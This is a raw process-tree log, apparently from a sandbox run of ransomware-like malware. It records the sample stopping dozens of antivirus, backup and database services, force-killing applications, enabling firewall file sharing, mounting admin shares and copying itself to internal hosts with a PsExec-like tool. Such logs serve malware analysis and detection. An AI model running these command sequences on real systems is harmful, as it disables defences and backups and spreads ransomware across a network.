C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Users2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\A$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\B$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\C$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\D$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\E$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\F$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\G$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\H$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\I$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Users2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\J$2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\K$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\A$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y4⤵
-
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\L$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\B$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\M$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\C$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\N$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\D$2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\O$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\E$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\F$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\P$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Q$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\G$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\R$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\H$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\S$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\I$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\T$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\J$2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\U$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\K$2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\V$2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe"C:\Users\Admin\AppData\Local\Temp\vx5qmv0q.exe" \\10.10.0.21 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\L$2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\W$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\M$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\X$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\N$2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Y$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\O$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\127.0.0.1\Z$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\P$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\Q$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\R$2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\S$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.10\T$2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
-
-
